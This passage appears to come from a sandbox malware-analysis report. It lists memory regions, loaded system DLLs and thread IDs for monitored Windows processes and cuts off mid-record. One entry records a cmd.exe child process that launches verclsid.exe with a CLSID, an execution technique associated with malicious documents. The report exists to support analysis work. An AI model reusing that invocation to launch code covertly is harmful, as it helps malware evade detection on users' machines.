filename = ""
Region:
id = 4431
start_va = 0x490000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 4432
start_va = 0x550000
end_va = 0x55ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 4433
start_va = 0x560000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 4434
start_va = 0x650000
end_va = 0x91efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4435
start_va = 0x920000
end_va = 0xaa7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000920000"
filename = ""
Region:
id = 4436
start_va = 0xab0000
end_va = 0xc30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ab0000"
filename = ""
Region:
id = 4437
start_va = 0xc40000
end_va = 0xcfffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c40000"
filename = ""
Region:
id = 4438
start_va = 0xd10000
end_va = 0xd8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d10000"
filename = ""
Region:
id = 4439
start_va = 0xd90000
end_va = 0xd9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d90000"
filename = ""
Region:
id = 4440
start_va = 0xe70000
end_va = 0xeeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 4441
start_va = 0xf40000
end_va = 0xfbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f40000"
filename = ""
Region:
id = 4442
start_va = 0x1080000
end_va = 0x117ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001080000"
filename = ""
Region:
id = 4443
start_va = 0x11c0000
end_va = 0x123ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011c0000"
filename = ""
Region:
id = 4444
start_va = 0x12a0000
end_va = 0x131ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012a0000"
filename = ""
Region:
id = 4445
start_va = 0x1320000
end_va = 0x141ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 4446
start_va = 0x1460000
end_va = 0x14dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 4447
start_va = 0x1550000
end_va = 0x15cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001550000"
filename = ""
Region:
id = 4448
start_va = 0x1660000
end_va = 0x16dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001660000"
filename = ""
Region:
id = 4449
start_va = 0x16e0000
end_va = 0x17dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016e0000"
filename = ""
Region:
id = 4450
start_va = 0x18e0000
end_va = 0x195ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018e0000"
filename = ""
Region:
id = 4451
start_va = 0x1a50000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a50000"
filename = ""
Region:
id = 4452
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4453
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4454
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4455
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4456
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4457
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4458
start_va = 0xff3f0000
end_va = 0xff3fafff
monitored = 0
entry_point = 0xff3f246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 4459
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 4460
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 4461
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 4462
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 4463
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 4464
start_va = 0x7fef89a0000
end_va = 0x7fef89d1fff
monitored = 0
entry_point = 0x7fef89bca90
region_type = mapped_file
name = "wmidcprv.dll"
filename = "\\Windows\\System32\\wbem\\WmiDcPrv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll")
Region:
id = 4465
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 4466
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4467
start_va = 0x7fefbf00000
end_va = 0x7fefbf10fff
monitored = 0
entry_point = 0x7fefbf01070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 4468
start_va = 0x7fefce40000
end_va = 0x7fefcec0fff
monitored = 0
entry_point = 0x7fefce4cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4469
start_va = 0x7fefced0000
end_va = 0x7fefcedcfff
monitored = 0
entry_point = 0x7fefced1348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 4470
start_va = 0x7fefcee0000
end_va = 0x7fefcf0bfff
monitored = 0
entry_point = 0x7fefcee1860
region_type = mapped_file
name = "umpo.dll"
filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll")
Region:
id = 4471
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
monitored = 0
entry_point = 0x7fefcf12068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 4472
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
monitored = 0
entry_point = 0x7fefcf313b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 4473
start_va = 0x7fefcf50000
end_va = 0x7fefcf61fff
monitored = 0
entry_point = 0x7fefcf51060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 4474
start_va = 0x7fefcf70000
end_va = 0x7fefcf8efff
monitored = 0
entry_point = 0x7fefcf75c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 4475
start_va = 0x7fefcf90000
end_va = 0x7fefcff6fff
monitored = 0
entry_point = 0x7fefcf9d320
region_type = mapped_file
name = "umpnpmgr.dll"
filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll")
Region:
id = 4476
start_va = 0x7fefd060000
end_va = 0x7fefd069fff
monitored = 0
entry_point = 0x7fefd063cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 4477
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4478
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 4479
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 4480
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4481
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4482
start_va = 0x7fefdb20000
end_va = 0x7fefdb5cfff
monitored = 0
entry_point = 0x7fefdb218f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 4483
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4484
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4485
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4486
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4487
start_va = 0x7fefdcf0000
end_va = 0x7fefdd2afff
monitored = 0
entry_point = 0x7fefdcf1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 4488
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4489
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4490
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4491
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4492
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4493
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4494
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4495
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4496
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4497
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4498
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4499
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4500
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4501
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4502
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4503
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4504
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4505
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4506
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4507
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4508
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 4509
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 4510
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 4511
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 4512
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 4513
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 4514
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 4515
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4516
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4517
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4518
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4519
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4520
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 4521
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 4522
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4535
start_va = 0x3c0000
end_va = 0x3cbfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 4981
start_va = 0x5e0000
end_va = 0x647fff
monitored = 0
entry_point = 0x61b450
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 5834
start_va = 0xdc0000
end_va = 0xe3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000dc0000"
filename = ""
Region:
id = 5835
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Thread:
id = 207
os_tid = 0x670
Thread:
id = 208
os_tid = 0x124
Thread:
id = 209
os_tid = 0x2ac
Thread:
id = 210
os_tid = 0x2a8
Thread:
id = 211
os_tid = 0x298
Thread:
id = 212
os_tid = 0x28c
Thread:
id = 213
os_tid = 0x288
Thread:
id = 214
os_tid = 0x284
Thread:
id = 215
os_tid = 0x280
Thread:
id = 216
os_tid = 0x274
Thread:
id = 217
os_tid = 0x26c
Thread:
id = 218
os_tid = 0x268
Thread:
id = 219
os_tid = 0x264
Thread:
id = 263
os_tid = 0x27c
Thread:
id = 283
os_tid = 0xc8
Process:
id = "29"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x676f8000"
os_pid = "0x5a8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "26"
os_parent_pid = "0x558"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4569
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4570
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4571
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4572
start_va = 0x110000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 4573
start_va = 0x4a830000
end_va = 0x4a888fff
monitored = 1
entry_point = 0x4a8390b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 4574
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4575
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4576
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4577
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4578
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4579
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4580
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4581
start_va = 0x210000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4582
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4583
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4584
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4585
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4586
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4587
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4588
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4589
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4590
start_va = 0x7fef7310000
end_va = 0x7fef7317fff
monitored = 0
entry_point = 0x7fef73111a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 4591
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4592
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4593
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4594
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4595
start_va = 0x210000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4596
start_va = 0x3c0000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 4597
start_va = 0x210000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4598
start_va = 0x330000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 4599
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4600
start_va = 0x4c0000
